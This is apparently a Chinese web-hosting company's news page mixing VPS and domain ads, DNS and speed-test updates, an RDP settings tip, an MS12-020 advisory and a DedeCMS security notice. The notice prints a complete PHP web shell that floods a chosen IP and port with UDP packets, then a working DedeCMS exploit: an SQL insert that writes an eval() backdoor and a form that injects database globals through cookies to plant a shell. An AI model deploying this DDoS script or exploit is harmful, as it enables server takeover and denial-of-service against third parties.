美国合租 云计算 支持分配多IP段 跨IP段 特别适合做SEO多IP的站点

什么是跨IP段?
购买我们的云计算VPS 默认分配一个IP
1.1.1.1
如果常规增加IP
只能增加 1.1.1.2-256 这种连续的IP段

现在可以自定义多个IP段
一个云计算VDS VPS 可以增加多个不同段的IP地址
比如
1.1.1.1 主IP
2.2.2.2 Addon 2段
3.3.3.3 Addon 3段
5.5.5.5 Addon 4段

无限增加多个IP段 访问速度均一样
特别适合一些做SEO用途站点的需求

IP如果被降权 可以申请免费更换整个IP段
买多少 用多少

无限制

不同于其他SEO VPS的是
我们是整个开头和结尾都不一样
不是1.1.1.1 到 1.2.2.2
而是 1.1.1.1 到222.222.222.222
都可以更换掉
无相关性的问题

如果有需要客户 可以联系客户服务定制 QQ 525742937

小语种域名注册说明

什么是小语种域名?
就是一些小国家,比如BS 就是巴哈马共和国的域名
而中文的意思通常把BS 鄙视 比试 等
通俗易记 所以很多人喜欢小语种域名,作为非主流域名使用

哪里查询小语种的域名?
在国内 我们接入了查询API 独家支持超300种的后缀
http://client.ushezu.com/domainext.php

查询到喜欢的域名 怎么注册?
注册需要联系我们客服 QQ 525742937
确认注册人的信息 付款方式 注册需知
因为部分注册局有特殊要求
比如SG 新加坡域名 只能是新加坡本地公司或者个人注册
比如FI 芬兰国家域名 只能是在芬兰贸易局有登记的公司 或者是在芬兰定居超15年有护照的人
部分域名我们可以提供当地公司信息进行注册. 但是不是每个域名都可以提供.
阅读全文

cPanel DNS服务器集群增加了一个加州HE.NET节点, 域名解析速度更快了

近期发现有部分域名使用我们的DNS解析服务器,
解析速度有降低

服务器解析请求增加也教快
所以我们增加了一台DNS服务器
目前已经有4台DNS集群了

增加的为佛罗里达州的he.net数据中心线路
亚洲访问速度均匀也比较快

现在域名解析依然为实时生效的

建议客户购买主机的时候 在我们公司注册域名
这样域名DNS自动设置为我们的
开通后就可以立刻访问

无延时压力

感谢大家一如既往的支持

网站访问速度评分 比较

本测试使用百度官方的统计工具自带的进行比较

测试百度官方
北京机房 电信和网通访问评分均为96分

美国合租客户网站
香港机房 电信和网通访问评分均为93分

美国合租客户网站
新加坡机房 电信和网通评分均为90分

美国合租客户网站
日本机房 网通评分为89分 电信为49分
(应该是线路问题引起的 电信有时90分有时50分不太稳定)

美国合租客户网站
美国机房 电信评分为83 网通评分为73

测试结果为中文站首选香港与新加坡 高速稳定
英文站首选美国 稳定
日文本地站 建议选日本 暂未开放申请

Incoming search terms:

当您对独享服务器时,可能会遇到由于本地到服务器端网络不稳定、客户端主机突然死机等原因造成远程桌面突然断开,

并尝试多次连接后仍然中断,却又达到最大远程桌面连接数后,只能通过重启服务器来解决的问题。现在我们就来通过对服

务器端的设置解决此问题:

首先登陆服务器点击:开始—设置—控制面板—管理工具—终端服务配置,打开“终端服务配置”配置后,我们点击窗

口左侧“连接”,此时窗口右侧列出RDP-Tcp,右键点击RDP-Tcp连接—属性,再点击“会话”标签,我们将“替代用户

设置”钩选,并将“结束已断开的会话”设置为10 分钟,点击“确定”设置完毕。

这样设置完毕后您就不用担心维护服务器时遇到此类问题的烦恼,当您本地与服务器端异常中断时,耐心等待10分钟后,

服务器端将自动注销上次的远程连接。 10分钟后您可以再次成功远程登陆服务器进行工作。

微软一直定期修补其不同的Windows版本以修正错误,防止系统受到攻击。但在周二公布的安全更新中,有些问题要引起特别注意。 微软在其官方博客上表示,Windows XP,Vista和7的用户应马上更新并下载安装MS12-020.
          漏洞问题涉及到Windows的远程桌面协议,该漏洞可能允许用户的Windows PC上运行恶意代码。
          这个漏洞是被一个匿名的第三方发现,随后立即联系微软。所有版本的Windows远程桌面协议被默认禁止,尽管如此,微软仍然建议强烈,所有的Windows用户安装安全更新。
          这个特殊漏洞是MS12-020 KB2671387修复的两个漏洞之一,编号CVE-2012-002,是一个高危级别的远程代码执行缺陷,存在于远程桌面协议(RDP)之中,影响所有版本的Windows系统。 因为自身的特殊性,RDP一般都是可以绕过防火墙的,而且该服务在几乎所有平台上都默认以SYSTEM身份运行于内核模式。微软发现,其中的一个漏洞可以直接允许远程攻击者很轻松地执行任意代码,进而获取主机和客户端系统的最高权限。 微软也提到了两种可以幸免的例外情况,一是开启终端服务网关(TSG)的服务器,二是使用了RemoteFX远程桌面功能的Windows Server 2008 R2 SP1,它们都不受影响。 如果愿意,用户还可以开启远程桌面的网络级别认证(NLA)服务,要求在与远程桌面服务器建立会话连接之前进行身份确认。这时候漏洞依然存在,并且可以利用,但必须通过身份认证才行。 微软表示,这个漏洞是秘密上报的,而且RDP在系统中默认关闭,所以目前还没有发现攻击现象,但因为问题严重,预计未来三十天内就会出现攻击代码。 需要使用远程桌面功能的用户还请尽快更新编号KB2621440、KB2667402两个补丁,其中Windows XP/Vista/Server 2003/Server 2008只需要更新第一个即可

如何主动取消购买的产品于服务,避免在美国合租的信用受损?

产品与服务的取消教程

首先 登录客户中心 点击  我的产品 – 查看详细
之后点击管理工具  – 取消产品
输入简单的为何取消, 选择取消方式
然后提交即可

图文教程  请点击标题全文阅读 阅读全文

使用DEDECMS 会导致此类问题
请客户删除此类应用程序 或者更新到最新版本后测试

此安全隐患已经严重导致美国服务器稳定性
此后发现 一律禁用账户

一般会被上传.php结尾的Web Shell 文件
命名一般会伪造  文件大小大约700字节上下

类似

<?php
$pass = $_POST['pass'];
if($pass != "ddos")
{
    echo "pass error!";
    return;
}

$getip = $_POST['getip'];
if($getip == "yes")
{
    $myip = gethostbyname($_SERVER["SERVER_NAME"]);
    echo $myip;
    return;
}

$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_POST['time'];

$time = time();
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
        $out .= "X";
}
while(1){
$packets++;
        if(time() > $max_time){
                break;
        }
        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo "僵尸发包:" . round(($packets*65)/1024, 2) . "兆";
?>

这个代码 黑客远程提交 ip 端口 php文件即会自动执行 DDOS其他服务器
导致服务器负载上升 带宽使用不正常
目前我们已有多台服务器发现此类问题 导致带宽严重不足 性能大幅下降
目前我们已经开始排除多台服务器 发现此类安全隐患的站点 一律做关闭处理

代码片段以及攻击方式

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell。

前题条件,必须准备好自己的dede数据库,然后插入数据:

以下是引用片段:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \'<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’);
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。

以下是引用片段:

<form action=”” method=”post” name=”QuickSearch” id=”QuickSearch” onsubmit=”addaction();”>
<input type=”text” value=”http://www.domian.com/plus/mytag_js.php?aid=1″ name=”doaction” style=”width:400″><br />
<input type=”text” value=”dbhost” name=”_COOKIE[GLOBALS][cfg_dbhost]” style=”width:400″><br />
<input type=”text” value=”dbuser” name=”_COOKIE[GLOBALS][cfg_dbuser]” style=”width:400″><br />
<input type=”text” value=”dbpwd” name=”_COOKIE[GLOBALS][cfg_dbpwd]” style=”width:400″><br />
<input type=”text” value=”dbname” name=”_COOKIE[GLOBALS][cfg_dbname]” style=”width:400″><br />
<input type=”text” value=”dede_” name=”_COOKIE[GLOBALS][cfg_dbprefix]” style=”width:400″><br />
<input type=”text” value=”true” name=”nocache” style=”width:400″>
<input type=”submit” value=”提交” name=”QuickSearchBtn”><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>